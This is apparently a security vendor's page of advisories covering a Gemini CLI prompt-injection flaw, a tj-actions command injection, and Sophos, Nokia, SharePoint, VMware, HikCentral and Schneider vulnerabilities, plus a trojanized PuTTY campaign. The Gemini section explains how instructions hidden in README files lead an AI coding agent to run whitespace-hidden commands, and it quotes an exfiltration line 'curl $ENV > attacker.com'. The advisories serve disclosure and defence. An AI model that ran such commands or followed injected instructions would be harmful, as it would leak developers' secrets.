Security advisory

Blogs Security Advisory

Analyzing the newly discovered Vulnerability in Gemini CLI; Impact on Software coding

Google’s Gemini command line interface (CLI) AI agent

Its not been one month when Google’s Gemini CLI vulnerability discovered by Tracebit researchers and found attackers could use prompt injection attacks to steal sensitive data.

Google’s Gemini CLI, an open-source AI agent for coding could allow attackers exploit to hide malicious commands, using “a toxic combination of improper validation, prompt injection and misleading UX,” as Tracebit explains.

After reports of the vulnerability surfaced, Google classified the situation as Priority 1 and Severity 1 on July 23, releasing the improved version two days later.

Those planning to use Gemini CLI should immediately upgrade to its latest version (0.1.14). Additionally, users could use the tool’s sandboxing mode for additional security and protection.

Disclosure of the vulnerability

Researchers reported on vulnerability directly to Google through its Bug Hunters programme. According to a timeline provided by Tracebit, the vulnerability was initially reported to Google’s Vulnerability Disclosure Programme (VDP) on 27 June, just two days after Gemini CLI’s public release.

Impact of the vulnerability

A detailed analysis found that in the patched version of Gemini CLI, attempts at code injection display the malicious command to users. This require explicit approval for any additional binaries to be executed. This change is intended to prevent the silent execution that the original vulnerability enabled.

Tracebit’s researchers played an important role in discovering and reporting the issue which is symbol of independent security research, particularly as AI-powered tools become central to software development workflows.

LLM integral to software development but hackers are using it too

Gemini CLI integrates Google’s LLM with traditional command line tools such as PowerShell or Bash. This allows developers to use natural language prompts to speed up tasks such as analyzing and debugging code, generating documentation, and understanding new repositories (“repos”).

As developers worldwide are using LLMs to help them develop code faster, attackers worldwide are using LLMs to help them understand and attack applications faster. 

Tracebit also discovered that malicious commands could easily be hidden in Gemini CLI This is possible by by packing the command line with blank characters, pushing the malicious commands out of the user’s sight.

More vigilance required when examining and running third-party or untrusted code, especially in tools leveraging AI to assist in software development.

Through the use of LLMs, AI excels at educating users, finding patterns and automate repetitive tasks.

Sam Cox, Tracebit’s founder, says he personally tested the exploit, which ultimately allowed him to execute any command — including destructive ones. “That’s exactly why I found this so concerning,” Cox told Ars Technica. “The same technique would work for deleting files, a fork bomb or even installing a remote shell giving the attacker remote control of the user’s machine.”

Source: https://in.mashable.com/tech/97813/if-youre-coding-with-gemini-cli-you-need-this-security-update

Security Advisory

Gemini CLI Vulnerability Enables Silent Execution of Malicious Commands on Developer Systems 

Summary 

Security Advisory :

In July 2025, a critical security vulnerability was discovered in Google’s Gemini CLI, a command-line tool used by developers to interact with Gemini AI. The flaw allowed attackers to execute hidden, malicious commands without user consent by exploiting prompt injection, poor command validation and an ambiguous trust interface. 

This issue was responsibly reported and addressed with the release of Gemini CLI version 0.1.14. The incident highlights the growing need for secure integration of AI tools in software development workflows. 

Vulnerability Details 

Security researchers identified that Gemini CLI reads project context files—such as README.md—to understand the codebase. Attackers can embed malicious commands into these files using indirect prompt injection techniques. These injected payloads are often disguised within legitimate content (e.g. license text, markdown formatting) to avoid detection. 

A core issue lies in Gemini’s handling of command approvals. Gemini CLI remembers previously approved commands (e.g. grep) to avoid prompting the user repeatedly. Attackers exploited this by appending malicious commands (e.g. curl $ENV > attacker.com) to a trusted one. Since the first part is familiar, the entire command string is executed without further validation. 

To increase stealth, malicious commands are hidden using whitespace padding or formatting tricks to avoid visual detection in the terminal or logs. Researchers demonstrated this attack by cloning a poisoned public GitHub repository, which resulted in unauthorized exfiltration of credentials during Gemini CLI analysis.Initially labeled as a low-severity issue, Google elevated its classification to a high-priority vulnerability and released a fix in version 0.1.14, which now enforces stricter visibility and re-approval of commands. 

Note: By default, Gemini CLI does not enable sandboxing, so manual configuration is required to isolate execution environments from the host system. 

Attack Flow 

Step Description 
1. Craft Malicious prompt injections are embedded inside context files like README.md along with benign code. 
2. Deliver Malicious repository is cloned or reviewed by a developer using Gemini CLI. 
3. Trigger Gemini CLI loads and interprets the context files. 
4. Execution Malicious code is executed due to weak validation and implicit trust. 
5. Exfiltrate Environment variables or secrets are silently sent to attacker-controlled servers. 

Proof-of-Concept Snippet 

Source: Tracebit 

Why It’s Effective 

  • Indirect Prompt Injection: Inserts malicious instructions within legitimate files rather than in direct input, bypassing typical user scrutiny. 
  • Command Whitelist Bypass: Weak command validation allows malicious extensions of approved commands. 
  • Visual Stealth: Large whitespace and terminal output manipulation hide malicious commands from users & security Tools. 

Broader Implications 

Gemini CLI are powerful for developers, helping to automate tasks and understand code faster. But this also comes with vulnerabilities especially when these tools can run commands and interact with untrusted code. This recent example shows how important it is to stay secure when using AI assistants to analyze unknown repositories. For teams working with open-source projects or unfamiliar codebases, it’s important to have safety checks in place. This highlights the growing need for smarter, more secure AI-driven tools that support developers without putting systems at risk. 

Remediation

  • Upgrade Gemini CLI to version 0.1.14 or later. 
  • Enable sandboxing modes where it is possible to isolate and protect systems. 
  • Avoid running Gemini CLI against untrusted or unknown codebases without appropriate safeguards. 
  • Review and monitor command execution prompts carefully 

Conclusion: 
The Gemini CLI vulnerability underscores how prompt injection and command trust mechanisms can silently expose systems to attack when using AI tools. As these assistants become more deeply integrated into development workflows, it’s vital to adopt a “trust, but verify” approach treating AI-generated or assisted actions with the same caution as externally sourced code. 

Security, visibility and isolation should be core pillars in any team’s approach to adopting AI in DevOps and engineering pipelines. 

References

Security Advisory

Critical Vulnerability identified in tj-actions/branch-names’ GitHub Action workflow

Security advisory:  Patch Now! Critical Command Injection in GitHub Action tj-actions/branch-names Affects 5,000+ public repositories. 

Summary:

A critical vulnerability has been identified in the tj-actions/branch-names’ GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags.

Severity Critical 
CVSS Score 9.1 
CVEs CVE-2025-54416 
POC Available Yes 
Actively Exploited No 
Exploited in Wild No
Advisory Version 1.0 

Overview 
This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks. This is fixed in version 9.0.0

The flaw allows attackers to run any command during GitHub Actions workflows by creating specially crafted branch names or tags.  

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Command Injection in branch-names GitHub Action  CVE-2025-54416   tj-actions/branch-names GitHub Action <v8.2.1 9.1  v9.0.0 or later 

Technical Summary 

This Vulnerability puts many CI/CD pipelines at serious risk, including the possibility of stealing secrets or injecting malicious code into releases.

The vulnerability exists due to unsafe usage of the eval command in the action’s script. Although some escaping was done using printf “%q”, developers later used eval printf “%s” to unescaped values, which reintroduced command injection risks.

Any branch name containing malicious shell code can trigger execution during workflows. 

The vulnerability affects GitHub Action workflows that use tj-actions/branch-names. It allows attackers to inject and execute arbitrary shell commands by creating a branch with malicious content. The issue is caused by the unsafe use of eval when handling branch names and tags in output generation. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-54416 GitHub repositories using tj-actions/branch-names < v8.2.1 Unsafe use of eval leads to command injection Attacker can run arbitrary commands, steal secrets, alter source code, or compromise workflows 

Proof of Concept (POC) 


 
Remediation

  • Update immediately to tj-actions/branch-names version v9.0.0 or higher
  • The vulnerable eval code has been replaced with safe printf usage. 
  • Review your workflows to ensure no malicious activity has occurred. 
  • Check logs for strange branch names or unexpected shell activity. 

Conclusion: 
This command injection flaw is extremely dangerous due to its simplicity and the number of projects it affects. GitHub Actions workflows that use branch names or tags from pull requests are especially at risk. Attackers don’t need access to the code just the ability to open a pull request.

All developers and security teams should act now by updating to the latest version and reviewing usage of GitHub Actions in their workflows. 

References

Security Advisory

Pre-Auth Remote Code Execution Flaws Patched in Sophos Firewall 

Summary : Sophos has resolved several critical security vulnerabilities in its Firewall products, the most severe vulnerability could allow remote code execution without authentication, potentially giving attackers full control over impacted systems.

OEM Sophos 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-6704, CVE-2025-7624 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

To address the issue, the Sophos has issued hotfixes for five separate vulnerabilities. Two of these are rated as critical and present a serious threat to enterprise networks around the globe. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Arbitrary file writing vulnerability in Secure PDF eXchange (SPX) feature  CVE-2025-6704 Sophos Firewall Critical   SFOS 21.0 MR2 (21.0.2) and later 
SQL injection vulnerability in legacy SMTP proxy CVE-2025-7624 Sophos Firewall Critical SFOS 21.0 MR2 (21.0.2) and later 

Technical Summary 

The CVE-2025-6704 and CVE-2025-7624 are identified in Sophos Firewall versions prior to 21.0 MR2 (21.0.2), both with a CVSS v3.1 base score of 9.8, indicating critical severity.  

The CVE-2025-6704 involves an arbitrary file writing vulnerability within the Secure PDF eXchange (SPX) feature.

SPX is enabled and the firewall operates in High Availability (HA) mode, attackers can exploit this flaw to execute arbitrary code remotely without authentication. This pre-authentication remote code execution can lead to full system compromise, affecting confidentiality, integrity and availability. 

CVE-2025-7624 pertains to an SQL injection vulnerability in the legacy (transparent) SMTP proxy of Sophos Firewall. If a quarantining policy is active for email and the system was upgraded from a version older than 21.0 GA, this weakness could potentially allow remote code execution.

Exploitation of this flaw can lead to unauthorized access, manipulation of firewall configurations, and potential lateral movement within the network. 

CVE ID System Affected  Vulnerability Details Impact 
 CVE-2025-6704 v21.5 GA and older A rare SPX feature flaw in HA mode can allow pre-auth remote code execution, affecting 0.05% of devices.  Pre-auth remote code execution (RCE) in Sophos Firewall SPX feature 
CVE-2025-7624 v21.5 GA and older An SQL injection in the legacy SMTP proxy can enable remote code execution if email quarantine is active and SFOS was upgraded from pre-21.0 GA. It affects up to 0.73% of devices. Remote code execution via SMTP proxy 

In addition to the Critical Severity vulnerabilities, two other High and one medium severity issues were addressed. 

CVE-2025-7382 – Command Injection in WebAdmin Interface (CVSS 8.8) 

A WebAdmin command injection flaw allows adjacent pre-auth code execution on HA auxiliary devices if admin OTP is enabled.  

CVE-2024-13974 – Business Logic Vulnerability in Up2Date Component (CVSS 8.1) 

 A business logic flaw in Up2Date lets attackers control firewall DNS to enable remote code execution. 

CVE-2024-13973 – Post-Auth SQLi Vulnerability in WebAdmin (CVSS 6.8) 

A post-auth SQL injection in WebAdmin allows admins to execute arbitrary code. 

Remediation

Users should immediately update Sophos Firewall to the latest patched version: 

  • For CVE-2025-6704, CVE-2025-7624, CVE-2025-7382: Upgrade to Sophos Firewall 21.0 MR2 (21.0.2) or later. 
  • For CVE-2024-13974 and CVE-2024-13973: Upgrade to Sophos Firewall 21.0 MR1 (20.0.1) or later. 

If you are not using the Secure PDF eXchange (SPX) feature or legacy SMTP proxy, consider disabling them until they are patched. 

Users operating legacy versions prior to the supported range must upgrade their systems to receive these critical security protections and maintain adequate defense against potential exploitation attempts.

Conclusion: 
In Sophos Firewalls that allow attackers to execute code remotely without logging in. Although only a small percentage of devices are affected, the flaws are serious.

Fortunately, Sophos quickly pushed automatic fixes, and no attacks have been seen so far. Users should verify their firewalls are fully updated and have auto update enabled to stay protected. 

The impact scope for this vulnerability reaches up to 0.73% of deployed devices. Both critical vulnerabilities were discovered and responsibly disclosed through Sophos’ bug bounty program by external security researchers.

References

Security Advisory

Critical Remote Code Execution in Nokia WaveSuite NOC 

Summary : Security Advisory: Two command injection vulnerabilities have been found in Nokia’s WaveSuite Network Operations Center (WS-NOC), a key tool used to manage telecom and enterprise networks.

OEM Nokia 
Severity Critical 
CVSS Score 9.0 
CVEs CVE-2025-24936, CVE-2025-24938   
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

These vulnerabilities allow attackers with limited access to run malicious commands on the system’s operating system. The vulnerabilities affect WS-NOC versions 23.6, 23.12, and 24.6. Nokia has released fixes in version 24.6 FP3 and newer. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ Command Injection Vulnerability  CVE-2025-24936 Nokia WS-NOC  Critical  v24.6 FP3 & later 
​ Command Injection Vulnerability  CVE-2025-24938 Nokia WS-NOC  High  v24.6 FP3 & later 

Technical Summary 

The first vulnerability, CVE-2025-24936, CVSS- 9.0 due to the system doesn’t properly check parts of a web address (URL). The attacker with low privileged access can trick the system into running malicious commands, as if they were part of the system itself. As this flaw has been published, attackers can remotely target exposed or inadequately secured administrative pages. 

The second issue, with the CVE-2025-24938, CVSS- 8.4 affects to new user accounts are created through the web interface. In this case, with high privileged access – administrators can intentionally enter harmful commands because their input isn’t being filtered properly. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025- 24936 WS-NOC 23.6, 23.12, 24.6 Unfiltered URL input enables command injection by low-privileged users. Remote code execution 
CVE-2025- 24938 WS-NOC 23.6, 23.12, 24.6 Insufficient input validation during account creation enables command injection. Privilege escalation, Remote code execution 

Remediation

  • Immediate Action: Upgrade WS-NOC to version 24.6 FP3 or latest one to mitigate both vulnerabilities. 

Recommendations: 

  • Configuration Check: Restrict admin panel and WS-NOC access to trusted, internal networks only. 
  • Environment Hardening: Regularly audit user privileges, conduct input validation reviews, and deploy security monitoring for unusual command executions originating from the WS-NOC application. 

Conclusion: 

CVE-2025-24936 and CVE-2025-24938 are critical command injection vulnerabilities in Nokia WaveSuite NOC, which is used in telecom systems around the world. These vulnerabilities allow attackers to execute malicious commands with limited access. As these systems are part of critical infrastructure, prompt patching is essential to prevent potential remote attacks and network disruption. 

References

Security Advisory

ToolShell Zero-Day Exploits in Microsoft SharePoint Enable Full Remote Takeover 

Summary : Security Advisory


Two newly discovered zero-day vulnerabilities (CVE-2025-53770 and CVE-2025-53771) in Microsoft SharePoint Server are being actively exploited in the wild.

There is currently no patch available to plug this security hole, but Microsoft says that customers running on-premises SharePoint Servers can stop attackers from exploiting the vulnerability by configuring Antimalware Scan Interface (AMSI) integration in SharePoint and deploying Defender AV on all SharePoint servers.

OEM Microsoft 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-53770, CVE-2025-53771 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

These flaws allow unauthenticated remote code execution on on-premises servers, bypassing authentication and gaining full control over affected systems. Microsoft has released urgent security updates for supported SharePoint versions to address this issue. 

                   Vulnerability Name CVE ID Product Affected Severity CVSS Score 
SharePoint Server Remote Code CVE-2025-53770 SharePoint Server (on-prem) Critical 9.8 
Execution Vulnerability CVE-2025-53771 SharePoint Server (on-prem) Medium 6.3 

Technical Summary 

The vulnerabilities CVE-2025-53770 and CVE-2025-53771 stem from insecure handling of cryptographic key material and deserialization logic in on-premises Microsoft SharePoint Servers. These flaws enable a chained remote code execution attack dubbed ToolShell, where an unauthenticated attacker can gain full control of vulnerable servers. 

ToolShell is a sophisticated evolution of vulnerabilities CVE-2025-49704 and CVE-2025-49706, which were disclosed and patched in early July 2025 following demonstrations at Pwn2Own Berlin. Within days, attackers had bypassed these initial patches, forcing Microsoft to issue updated patches with new CVEs (53770, 53771). These latest variants are actively exploited in the wild. 

The exploit begins with a crafted request to the SharePoint endpoint /ToolPane.aspx, which exposes the internal configuration mechanism. By exploiting deserialization weaknesses, attackers extract cryptographic secrets, specifically the ValidationKey and DecryptionKey  which are used to sign the VIEWSTATE payloads. 

With these secrets, an attacker can generate malicious, signed payloads that are trusted by SharePoint’s security model, allowing arbitrary code execution without any authentication. This effectively turns SharePoint’s trust mechanism into a delivery vector for persistent compromise. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-53770 SharePoint 2016, 2019 Exploits deserialization in /ToolPane.aspx to steal crypto keys and craft signed __VIEWSTATE payloads Remote Code Execution, full system compromise 
CVE-2025-53771 SharePoint 2016, 2019 Variant of CVE-2025-49706; bypasses earlier fixes using enhanced payload injection techniques Persistent access without credentials 

Remediation: To mitigate potential attacks customers should follow:

Organizations running on-premises Microsoft SharePoint Servers must take the following steps immediately: 

  1. Apply Security Updates: 
  • SharePoint Subscription Edition: KB5002768 
  1. Enable AMSI Protection: 
  • Enable Antimalware Scan Interface (AMSI) in Full Mode for SharePoint. 
  • AMSI was turned on by default in Sept 2023 updates for 2016/2019. 
  1. Rotate Cryptographic Keys: 
  • Use Update-SPMachineKey (PowerShell) or Central Admin. 
  • Restart IIS using iisreset.exe after key rotation. 
  1. Deploy Endpoint Protection: 
  • Use Microsoft Defender for Endpoint or equivalent XDR tools. 

CISA Alert and Advisory Inclusion: 

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-53770 to its Known Exploited Vulnerabilities (KEV) catalog. Federal agencies and private-sector partners are required to apply mitigations immediately due to confirmed active exploitation. CISA emphasized that such vulnerabilities pose an unacceptable risk to federal systems and critical infrastructure. 

Indicators of Compromise (IOCs): 

Type Value (Obfuscated/Generalized) Description 
IP Address 107.191.58[.]76, 104.238.159[.]149 Observed in initial and second attack waves 
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 User-Agent string seen in exploitation requests 
URL Path POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx Exploit entry point targeting ToolPane 

Conclusion: 
The ToolShell exploit chain represents a critical security threat to organizations using on-premises SharePoint Servers.

The vulnerabilities are not theoretical, attackers are actively exploiting them to gain full control of systems, exfiltrate cryptographic secrets and establish long-term persistence. With official patches now available, immediate action is required to prevent compromise, contain exposure and ensure ongoing system integrity. 

References

Security Advisory

Critical Zero-Day Vulnerabilities in VMware Exploited at Pwn2Own 2025 – Patch Immediately  

Summary : VMware fixed four vulnerabilities in VMware ESXi, Workstation, Fusion and VMware Tools that were exploited as zero-days during the Pwn2Own Berlin 2025 hacking contest in May 2025.

OEM Broadcom 
Severity Critical 
CVSS Score 9.3 
CVEs CVE-2025-41236, CVE-2025-41237, CVE-2025-41238, CVE-2025-41239 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 
These vulnerabilities, now tracked as CVE-2025-41236, CVE-2025-41237, CVE-2025-41238 and CVE-2025-41239, could allow attackers with local administrative privileges on a virtual machine to execute arbitrary code on the host system or leak sensitive memory content.

VMware has released critical patches for affected products, including ESXi 7/8, Workstation Pro 17.x, Fusion 13.x and VMware Tools. 

                   Vulnerability Name CVE ID Product Affected Severity Fixed Version 
VMXNET3 Integer Overflow CVE-2025-41236 ESXi, Workstation, Fusion Critical (CVSS 9.3) ESXi80U3f-24784735, ESXi70U3w-24784741, ESXi80U2e24789317, 
Workstation 17.6.4, Fusion 13.6.4 
VMCI Integer UnderfloCVE-2025-41237 ESXi, Workstation, Fusion Critical (CVSS 9.3) Same as above 
PVSCSI Heap Overflow CVE-2025-41238 ESXi, Workstation, Fusion Critical (CVSS 9.3) Same as above 
vSockets Info Disclosure CVE-2025-41239 ESXi, Workstation, Fusion,  VMware Tools High (CVSS 7.1) VMware Tools 13.0.1.0, same ESXi/Workstation/Fusion versions 

Technical Summary 

These vulnerabilities impact key virtualization components, potentially enabling virtual machine breakout or data leakage from the host system.

The exploitation requires local admin privileges on the guest VM and varies in impact depending on the platform (ESXi, Workstation, or Fusion). 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-41236 ESXi 7/8, Workstation 17.x, Fusion 13.x Integer overflow in VMXNET3 adapter allows arbitrary code execution on the host via specially crafted network packets from a guest VM. Host code execution from guest VM 
CVE-2025-41237 Same as above Integer underflow in VMCI component can lead to out-of-bounds write and code execution in the VMX process on the host. VM breakout; Host compromise (Workstation/Fusion) 
CVE-2025-41238 Same as above Heap overflow in the PVSCSI controller allows out-of-bounds write more severe on Workstation/Fusion than ESXi due to sandbox restrictions. Host compromise (desktop platforms); limited on ESXi 
CVE-2025-41239 ESXi 7/8, Workstation 17.x, Fusion 13.x,  VMware Tools Use of uninitialized memory in vSockets allows information disclosure to attackers with local VM admin rights. Memory leak from host to guest 

Remediation

Users and administrators are strongly advised to immediately apply the following patches to mitigate the vulnerabilities: 

  • VMware ESXi users must update to ESXi80U3f-24784735, ESXi80U2e-24789317 for 8.x and ESXi70U3w-24784741 for 7.x versions. 
  • VMware Workstation Pro users should update to version 17.6.4 or later. 
  • VMware Fusion users to version 13.6.4 or later. 
  • For VMware Tools, apply the 13.0.1.0 or later, especially for Windows guests where the vSockets vulnerability (CVE-2025-41239) is relevant. 

Conclusion: 


These vulnerabilities pose a serious threat to virtualization security, especially in environments using VMware Workstation and Fusion. A successful exploit could enable attackers to escape the virtual machine and compromise the host system.

Administrators should prioritize patching to avoid exposure and reduce the risk of virtual infrastructure compromise. Regular audits of virtual networking components and least-privilege access controls within guest VMs are also recommended. 

References

Security Advisory

CVE-2025-34067: Critical RCE in HikCentral Puts Global Surveillance at Risk, PoC Available 

Summary:  A critical RCE vulnerability has been found in the Hikvision HikCentral security management system, mainly in the apply CT component.

OEM Hikvision 
Severity Critical 
CVSS Score 10.0 
CVEs CVE-2025-34067 
POC Available Yes 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

It helps attackers to take full control of servers that manage security cameras and building systems without user interaction and authentication. The issue comes from a weakness in an old part of the software – Fastjson, a Java library.

Hackers can use this flaw to run harmful code remotely over the network. A PoC to exploit this vulnerability has been published already. 

Vulnerability Name CVE ID Product Affected Severity 
​ Remote Code Execution Vulnerability CVE-2025-34067 HikCentral (applyCT) Critical 

Technical Summary 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-34067 HikCentral  The /bic/ssoService/v1/applyCT endpoint is vulnerable due to the use of an outdated Fastjson library with unsafe auto-type deserialization enabled. Attackers can send malicious JSON payloads containing LDAP references to attacker-controlled Java classes. Remote code execution  

A security flaw exists in the “/bic/ssoService/v1/applyCT” endpoint, which accepts JSON input. This allows attackers to send specially designed data that tricks the system into loading malicious code from an attacker-controlled server.

Since the system processes this data before checking if the user is logged in, even someone without any login credentials can exploit it. If successful, the attacker can run harmful code under the HikCentral service’s permissions. This helped them move through the network, access or control camera feeds, DVRs/NVRs, and other connected systems across the enterprise.Proof of Concept (PoC): 

(Source: PeiQi0 )

Remediation

  • Apply Patches: Users should contact HIKVISION support for immediate remediation guidance and apply any security updates or hotfixes provided by the vendor. 
  • Update Fastjson Library: Ensure the Fastjson library is updated to a secure patched version. 

Recommendations: 

  • Configuration Check: If patching isn’t possible, block or redirect all traffic to the “/bic/ssoService/” endpoints – especially on systems that are accessible from the internet. 
  • Network Segmentation: Isolate surveillance and physical security networks from business-critical systems. 
  • Monitoring: Check logs for outbound LDAP traffic, suspicious Java class loads, or unexpected command execution from the HikCentral host. 

Conclusion: 
This vulnerability helps attackers to take full control of the system, Publicly available code makes it easy for attackers to exploit this flaw. Because of the critical risk, it has received the maximum severity score (CVSS 10.0).  

If not fixed, attackers could turn off security cameras, change alarm settings, delete important evidence, and even watch staff movements live. To protect against this threat, it’s urgent to install the latest patch, isolate the system from the internet and closely monitor for suspicious activity. 

References

Security Advisory

SEO Poisoning Campaign Targets IT Admins with Weaponized PuTTY & WinSCP 

SEO poisoning & malvertising campaign Summary 

A sophisticated SEO poisoning and malvertising campaign has been active since early June 2025, targeting IT administrators with Trojanized installers of commonly used tools like PuTTY and WinSCP. 

Attackers are manipulating search engine results and sponsored ads to lead users to fake websites, which deliver backdoored versions of these tools. Arctic Wolf security researchers have uncovered thia malvertising campaign that has been targeting IT professionals since early June 2025.

The malicious campaign leverages search engine manipulation to promote fake download sites that closely mimic legitimate software repositories. 

Technical Summary 

A threat campaign has been leveraging SEO poisoning and malicious advertisements to trick IT professionals into downloading Trojanized versions of PuTTY and WinSCP from fake websites. Once installed, a malware known as Oyster (aka Broomstick) creates persistent access within the victim’s environment, posing a severe risk to enterprise infrastructure. 

This malware establishes persistence by creating a scheduled task that triggers every three minutes, invoking rundll32.exe to execute a malicious DLL named twain_96.dll using the DllRegisterServer export function, a technique commonly used to bypass traditional detection.  

The attackers specifically target IT administrators and system operators due to their elevated privileges, which allows rapid lateral movement, access to sensitive systems such as domain controllers and the potential deployment of additional payloads like ransomware.

The campaign’s effectiveness stems from its exploitation of everyday workflows, especially IT admins’ reliance on search engines to download tools making it both highly targeted and socially engineered for success. 

Element Detail 
Initial Access SEO poisoning and fake sponsored ads redirect users to malicious download sites. 
Malicious Tools Trojanized installers of PuTTY and WinSCP. 
Payload Backdoor malware is known as Oyster/Broomstick. 
Persistence Scheduled Task every 3 minutes executing twain_96.dll using rundll32.exe via DllRegisterServer. 
Target IT admins with elevated privileges (Domain Admins, Server Admins). 
Objective Network penetration, domain controller access, data exfiltration, possible ransomware deployment. 

Malicious Sponsored PuTTY Ad on Bing.       Source: Arcticwolf 

Observed Malicious Domains 

Organizations are urged to block the following domains immediately: 

  • updaterputty[.]com 
  • zephyrhype[.]com 
  • putty[.]run 
  • putty[.]bet 
  • puttyy[.]org 

These domains host fake versions of PuTTY and WinSCP and are actively used in the ongoing campaign. 

Remediation

1. Enforce Trusted Software Acquisition Policies 

  • Mandate the use of verified internal software repositories or direct access to official vendor websites. 
  • Where feasible, implement ad-blocking or web filtering to restrict access to software download categories known to be targeted by malvertising. 

2. Strengthen Network and Endpoint Security Controls 

  • Block known malicious domains at firewall and DNS levels. 
  • Continuously monitor endpoints for suspicious behavior, including: 
  • The creation of unauthorized or high frequency scheduled tasks. 
  • DLL execution via rundll32.exe, especially involving non-standard DLLs such as twain_96.dll. 
  • Deploy or enhance EDR/XDR solutions to detect backdoor persistence methods. 

3. User Awareness 

  • Educate IT staff on SEO poisoning and the risks of downloading tools via search results. 

Conclusion: 
By focusing on widely used administrative tools like PuTTY and WinSCP, threat actors are exploiting the trust and habits of IT professionals through convincing social engineering and poisoned search results.

This approach turns essential tools into delivery mechanisms for backdoors and persistent threats, compromising high-privilege users at the core of enterprise infrastructure.  

Organizations must respond decisively by reinforcing endpoint monitoring, tightening software acquisition policies and implementing robust network-level defenses to mitigate the risks posed by this rapidly evolving threat landscape. 

References

Security Advisory

Critical Flaws Expose Schneider DCE to Remote Exploits – Patch Now 

Summary : Schneider Electric has found critical security flaws in its EcoStruxure IT Data Center Expert software (version 8.3 and earlier) which allow attackers to run harmful codes, steal data or disrupt data center operations. The EcoStruxure IT Data Center is a scalable monitoring solution for data center equipment. Through the web interface the flaw allows unauthenticated remote code execution when HTTP is enabled, though it is disabled by default.

Severity Critical 
CVSS Score 10.0 
CVEs CVE-2025-50121, CVE-2025-50122, CVE-2025-50123, CVE-2025-50125 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

The most severe flaw lets attackers execute commands remotely without logging in and other risks include weak password generation and privilege misuse.

Schneider urges users to upgrade to version 9.0. as a priority, if users are unable to update right now, users should secure their systems by limiting access, disabling unused services, using VPNs and security best practices. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
OS Command Injection  CVE-2025-50121 EcoStruxure IT Data Center Expert (DCE)  Critical  v 9.0 
Insufficient Entropy (Weak Root Password Generation)  CVE-2025-50122 EcoStruxure IT Data Center Expert (DCE)  High  v 9.0 
Insufficient Entropy (Weak Root Password Generation) CVE-2025-50123 EcoStruxure IT Data Center Expert (DCE) High v 9.0 
Insufficient Entropy (Weak Root Password Generation)  CVE-2025-50125 EcoStruxure IT Data Center Expert (DCE) High v 9.0 

Technical Summary 

The vulnerabilities have been identified in the system that exposes it to remote takeover, unauthorized access and internal data exposure.

At the core of the risk is a command injection flaw in the web interface, where unsanitized input allows attackers to execute system-level commands without authentication.

Compounding the issue is a weak password generation mechanism that uses low-entropy values, making root credentials easier to predict if installation or update packages are obtained.

Privileged users can also exploit unsafe input handling, specifically in fields like the hostname to inject and execute arbitrary code.

Furthermore, improper validation of internal HTTP requests allows attackers to perform server-side request forgery (SSRF), potentially accessing internal services and sensitive resources without credentials. 

CVE ID CVSS Score System Affected  Vulnerability Details Impact 
CVE-2025-50121 10.0 Web interface Allows unauthenticated attackers to run system commands via malicious folder in web interface. Unauthenticated RCE, full system compromise. 
CVE-2025-50122 8.3 Password generation system Allows unauthenticated attackers to run system commands via malicious folder in web interface. Root access by reverse-engineering password generation, leading to full control. 
CVE-2025-50123 7.2 Server console interface Allows unauthenticated attackers to run system commands via malicious folder in web interface. Arbitrary command execution by privileged users, risking internal misuse or escalation  
CVE-2025-50125 7.2 HTTP request handler Attackers manipulate hidden URLs to access internal services or run code without login. Unauthorized access to internal services, RCE and data exposure. 

In addition to the Critical and High Severity vulnerabilities, Two other medium severity issues were addressed. 

CVE-2025-50124 – Improper Privilege Management (CVSS 6.9) 
This issue allows privilege escalation through a setup script by a user already holding elevated access via the console. 

CVE-2025-6438 – XML External Entity (XXE) Injection (CVSS 6.8) 

 Attackers could exploit SOAP API calls to inject malicious XML entities and gain unauthorized file access. 

Remediation

  • Immediately upgrade to EcoStruxure DCE version 9.0 or the latest one to fix critical security flaws. 

Schneider recommends hardening DCE instances per the EcoStruxure IT Data Center Expert Security Handbook and adopting cybersecurity best practices.

Attackers could gain full access, run harmful commands, or steal data. It is strongly advised to update to version 9.0 or apply strict security measures to reduce the risks immediately.

IoT and Evolving Threat landscape

Industrial IoT security threats have evolved from theoretical concerns to active, persistent dangers that target manufacturing operations worldwide.

The convergence of traditional operational technology with modern information technology has created attack vectors that cybercriminals, nation-state actors, and industrial espionage operations actively exploit.

The financial impact of industrial cybersecurity incidents continues to escalate, with the average cost of a manufacturing sector data breach reaching $4.97 million in 2024, not including potential regulatory fines, business interruption losses, and long-term reputation damage. 

The security flaws in Schneider’s EcoStruxure IT Data Center Expert software exposes the dynamic threat landscape that may exist in Industrial IoT .


These vulnerabilities in Schneider Electric’s EcoStruxure DCE can seriously affect system security and data center operations. 

References

Scroll to top